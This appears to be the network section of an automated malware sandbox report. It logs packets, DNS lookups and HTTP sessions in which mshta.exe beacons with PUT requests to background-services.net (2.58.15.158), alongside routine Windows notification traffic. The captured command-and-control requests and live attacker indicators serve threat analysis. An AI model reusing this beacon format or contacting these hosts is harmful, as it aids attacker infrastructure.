                        Jan 13, 2025 21:33:56.746691942 CET  80           59240      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:33:56.746779919 CET  59240        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:34:23.743422985 CET  59240        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:34:23.743894100 CET  59242        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:34:23.748586893 CET  80           59240      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:34:23.748776913 CET  80           59242      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:34:23.748915911 CET  59242        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:34:23.750430107 CET  59242        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:34:23.751080990 CET  59242        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:34:23.755341053 CET  80           59242      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:34:23.755930901 CET  80           59242      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:34:24.342899084 CET  80           59242      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:34:24.343216896 CET  59242        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:34:29.348165035 CET  80           59242      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:34:29.348325014 CET  59242        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:34:51.377315998 CET49691443192.168.2.262.23.242.162
                        Jan 13, 2025 21:34:51.382637024 CET443496912.23.242.162192.168.2.26
                        Jan 13, 2025 21:34:51.382699966 CET49691443192.168.2.262.23.242.162
                        Jan 13, 2025 21:34:51.393925905 CET49692443192.168.2.262.16.168.103
                        Jan 13, 2025 21:34:51.398854017 CET443496922.16.168.103192.168.2.26
                        Jan 13, 2025 21:34:51.398915052 CET49692443192.168.2.262.16.168.103
                        Jan 13, 2025 21:34:53.118654013 CET5924280192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.118956089 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.384414911 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.384435892 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.384445906 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.384474993 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.384527922 CET49687443192.168.2.262.16.158.35
                        Jan 13, 2025 21:34:53.384556055 CET49687443192.168.2.262.16.158.35
                        Jan 13, 2025 21:34:53.384814978 CET49687443192.168.2.262.16.158.35
                        Jan 13, 2025 21:34:53.384814978 CET49687443192.168.2.262.16.158.35
                        Jan 13, 2025 21:34:53.385823965 CET80592422.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.385839939 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.385926008 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.386176109 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.386368990 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.389873981 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.390902996 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.391128063 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.983913898 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.984030962 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:58.987380981 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:58.987524986 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:16.532146931 CET49672443192.168.2.2620.198.118.190
                        Jan 13, 2025 21:35:16.532195091 CET4434967220.198.118.190192.168.2.26
                        Jan 13, 2025 21:35:17.167182922 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.167223930 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:17.167292118 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.168267012 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.168275118 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:17.987751007 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:17.991229057 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.999394894 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.999409914 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:17.999679089 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:18.054238081 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.408096075 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.408096075 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.408119917 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:19.408319950 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.455322981 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:19.585201979 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:19.585314989 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:19.586030006 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.586030006 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.586236000 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.196712017 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.196753979 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:20.196876049 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.197731972 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.197743893 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:20.980047941 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:20.980207920 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.982237101 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.982248068 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:20.982476950 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:21.036611080 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.481851101 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.481868029 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.481882095 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.482055902 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.523334026 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.652265072 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.652333975 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.652399063 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.652530909 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.652549982 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.954543114 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.954955101 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.959803104 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:22.959872007 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:22.960020065 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.960267067 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.960386038 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.965137959 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:22.965248108 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:23.582191944 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:23.587306976 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:28.587837934 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:28.588074923 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:28.908420086 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:28.908468962 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:28.908525944 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:28.909336090 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:28.909352064 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:29.727875948 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:29.728184938 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:29.730272055 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:29.730283022 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:29.730528116 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:29.772697926 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:30.989384890 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:30.989438057 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:30.989448071 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:30.989557981 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:31.031335115 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:31.163924932 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:31.163999081 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:31.164705038 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:31.164705038 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:31.164746046 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:31.164777994 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:40.648314953 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:40.653347015 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:41.549266100 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:41.549401999 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:41.549627066 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:41.550575018 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:41.550611019 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:42.625166893 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:42.625263929 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:42.627372026 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:42.627403021 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:42.627643108 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:42.679177999 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:43.858726978 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:43.858793020 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:43.858819008 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:43.858927965 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:43.899341106 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:44.036482096 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:44.036708117 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:44.036813021 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:44.036981106 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:44.036998034 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:49.100621939 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:49.105525970 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:49.105627060 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:49.105818987 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:49.105992079 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:49.110553026 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:49.110718012 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:49.730720043 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:49.730950117 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:54.734040976 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:54.734112978 CET5925380192.168.2.262.58.15.158
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Jan 13, 2025 21:33:39.194685936 CET | 192.168.2.26 | 1.1.1.1 | 0x6bbd | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                        Jan 13, 2025 21:33:50.695576906 CET | 192.168.2.26 | 1.1.1.1 | 0x9819 | Standard query (0) | background-services.net | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Jan 13, 2025 21:33:06.987019062 CET | 1.1.1.1 | 192.168.2.26 | 0x44fc | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.18 | A (IP address) | IN (0x0001) | false
                        Jan 13, 2025 21:33:06.987019062 CET | 1.1.1.1 | 192.168.2.26 | 0x44fc | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.35 | A (IP address) | IN (0x0001) | false
                        Jan 13, 2025 21:33:06.987019062 CET | 1.1.1.1 | 192.168.2.26 | 0x44fc | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.34 | A (IP address) | IN (0x0001) | false
                        Jan 13, 2025 21:33:06.987019062 CET | 1.1.1.1 | 192.168.2.26 | 0x44fc | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.20 | A (IP address) | IN (0x0001) | false
                        Jan 13, 2025 21:33:06.987019062 CET | 1.1.1.1 | 192.168.2.26 | 0x44fc | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.36 | A (IP address) | IN (0x0001) | false
                        Jan 13, 2025 21:33:06.987019062 CET | 1.1.1.1 | 192.168.2.26 | 0x44fc | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.19 | A (IP address) | IN (0x0001) | false
                        Jan 13, 2025 21:33:06.987019062 CET | 1.1.1.1 | 192.168.2.26 | 0x44fc | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.23 | A (IP address) | IN (0x0001) | false
                        Jan 13, 2025 21:33:06.987019062 CET | 1.1.1.1 | 192.168.2.26 | 0x44fc | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.39 | A (IP address) | IN (0x0001) | false
                        Jan 13, 2025 21:33:39.202173948 CET | 1.1.1.1 | 192.168.2.26 | 0x6bbd | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                        Jan 13, 2025 21:33:50.730290890 CET | 1.1.1.1 | 192.168.2.26 | 0x9819 | No error (0) | background-services.net | | 2.58.15.158 | A (IP address) | IN (0x0001) | false
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.26 | 59240 | 2.58.15.158 | 80 | 1460 | C:\Windows\System32\mshta.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Jan 13, 2025 21:33:50.764348030 CET | 269 | OUT | PUT /setup.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 84
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:33:50.764658928 CET | 84 | OUT | Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user","qoaksfjiam":1}
                        Jan 13, 2025 21:33:51.382364988 CET | 1181 | IN | HTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:33:51 GMT
                        Server: Apache
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
                        Content-Length: 945
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8
                        Jan 13, 2025 21:33:51.412499905 CET | 269 | OUT | PUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:33:51.412691116 CET | 69 | OUT | Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:33:51.743153095 CET | 186 | IN | HTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:33:51 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.26 | 59242 | 2.58.15.158 | 80 | 1460 | C:\Windows\System32\mshta.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Jan 13, 2025 21:34:23.750430107 CET | 269 | OUT | PUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:34:23.751080990 CET | 69 | OUT | Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:34:24.342899084 CET | 187 | IN | HTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:34:24 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.26 | 59243 | 2.58.15.158 | 80 | 1460 | C:\Windows\System32\mshta.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Jan 13, 2025 21:34:53.386176109 CET | 269 | OUT | PUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:34:53.386368990 CET | 69 | OUT | Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:34:53.983913898 CET | 187 | IN | HTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:34:53 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.26 | 59248 | 2.58.15.158 | 80 | 1460 | C:\Windows\System32\mshta.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Jan 13, 2025 21:35:22.960267067 CET | 269 | OUT | PUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:35:22.960386038 CET | 69 | OUT | Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:35:23.582191944 CET | 187 | IN | HTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:35:23 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.26 | 59253 | 2.58.15.158 | 80 | 1460 | C:\Windows\System32\mshta.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Jan 13, 2025 21:35:49.105818987 CET | 269 | OUT | PUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:35:49.105992079 CET | 69 | OUT | Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:35:49.730720043 CET | 187 | IN | HTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:35:49 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                        0 | 192.168.2.26 | 59244 | 40.115.3.253 | 443
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-13 20:35:19 UTC | 71 | OUT | Data Ascii: CNT 1 CON 316MS-CV: 5GWTnKexLUqQmVWH.1Context: c48eaed75171b8df
                        2025-01-13 20:35:19 UTC | 260 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.22631.4169</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>0018C00F661F22E2</deviceName><followRetry>true</followRetry></agent></con
                        2025-01-13 20:35:19 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5GWTnKexLUqQmVWH.2Context: c48eaed75171b8df<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAanPiG3q4HeoENIGqhpwx1Cl41k32GCussqo4NdKnLAeci25tDyFKpnRorTGwYMfYT6r+i4kpVhWscFcu9nAs9lK5cUkK7Ks9COwAk/9Ob5oPK
                        2025-01-13 20:35:19 UTC224OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 35 47 57 54 6e 4b 65 78 4c 55 71 51 6d 56 57 48 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 38 65 61 65 64 37 35 31 37 31 62 38 64 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 1044478 197MS-CV: 5GWTnKexLUqQmVWH.3Context: c48eaed75171b8df<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2025-01-13 20:35:19 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2025-01-13 20:35:19 UTC58INData Raw: 4d 53 2d 43 56 3a 20 35 35 4f 30 77 4b 34 4d 6b 30 71 49 4c 77 53 61 58 65 4a 78 61 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: 55O0wK4Mk0qILwSaXeJxag.0Payload parsing failed.


                        Session ID  Source IP     Source Port  Destination IP  Destination Port
                        1           192.168.2.26  59246        40.115.3.253    443
                        Timestamp                Bytes transferred  Direction  Data
                        2025-01-13 20:35:22 UTC  71                 OUT        Data Ascii: CNT 1 CON 316MS-CV: gvLdGNidw0KNi2vi.1Context: fa7f73ef0ac7a776
                        2025-01-13 20:35:22 UTC  260                OUT        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.22631.4169</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>0018C00F661F22E2</deviceName><followRetry>true</followRetry></agent></con
                        2025-01-13 20:35:22 UTC  1084               OUT        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: gvLdGNidw0KNi2vi.2Context: fa7f73ef0ac7a776<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARyR9VQ2jGQbMuso778kz7+WSse4HuFwriSF600LuNEl/1O+9CTsupDHOmaSmbiuWgx5p/W1YPgyBLbaC6DDMDujioseYOxVlRxClyMktiE2Om
                        2025-01-13 20:35:22 UTC  224                OUT        Data Ascii: BND 3 CON\WNS 1044478 197MS-CV: gvLdGNidw0KNi2vi.3Context: fa7f73ef0ac7a776<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2025-01-13 20:35:22 UTC  14                 IN         Data Ascii: 202 1 CON 58
                        2025-01-13 20:35:22 UTC  58                 IN         Data Ascii: MS-CV: W1kJiv+5uUCaF5Ef4iGarg.0Payload parsing failed.


                        Session ID  Source IP     Source Port  Destination IP  Destination Port
                        2           192.168.2.26  59249        40.115.3.253    443
                        Timestamp                Bytes transferred  Direction  Data
                        2025-01-13 20:35:30 UTC  71                 OUT        Data Ascii: CNT 1 CON 316MS-CV: uPeYQ8Gb60O8fxFB.1Context: c8e82a777f07bc46
                        2025-01-13 20:35:30 UTC  260                OUT        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.22631.4169</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>0018C00F661F22E2</deviceName><followRetry>true</followRetry></agent></con
                        2025-01-13 20:35:30 UTC  1084               OUT        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: uPeYQ8Gb60O8fxFB.2Context: c8e82a777f07bc46<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWPSXu9j1cyfzQQFRAv9dFvI9ChjWSP7xw8QyuHhPemQ5xrdWuJsfrdgZaBcCqLFFFxrZni4LK8GkcsDSUpo/sQ9qN0juB1kbR8l2Fr/S1cQ3Z
                        2025-01-13 20:35:30 UTC  224                OUT        Data Ascii: BND 3 CON\WNS 1044478 197MS-CV: uPeYQ8Gb60O8fxFB.3Context: c8e82a777f07bc46<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2025-01-13 20:35:31 UTC  14                 IN         Data Ascii: 202 1 CON 58
                        2025-01-13 20:35:31 UTC  58                 IN         Data Ascii: MS-CV: b3EFkrK2WUGKPsS0txBxhg.0Payload parsing failed.


                        Session ID  Source IP     Source Port  Destination IP  Destination Port
                        3           192.168.2.26  59251        40.115.3.253    443
                        Timestamp                Bytes transferred  Direction  Data
                        2025-01-13 20:35:43 UTC  71                 OUT        Data Ascii: CNT 1 CON 316MS-CV: lX2vJPKD90GW8IvR.1Context: b2acb5805f18a21f
                        2025-01-13 20:35:43 UTC  260                OUT        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.22631.4169</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>0018C00F661F22E2</deviceName><followRetry>true</followRetry></agent></con
                        2025-01-13 20:35:43 UTC  1084               OUT        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: lX2vJPKD90GW8IvR.2Context: b2acb5805f18a21f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAamxVXh4jclvTQBmkVEaue7EyxVMIRE6w23FDPDMUkpG6v0cpxZCAHQkFGzzQ+/gQ5g4Dv4aB+fOOmpEEzevXGXm5dSciUjoC/X0FzJLEdhXOq
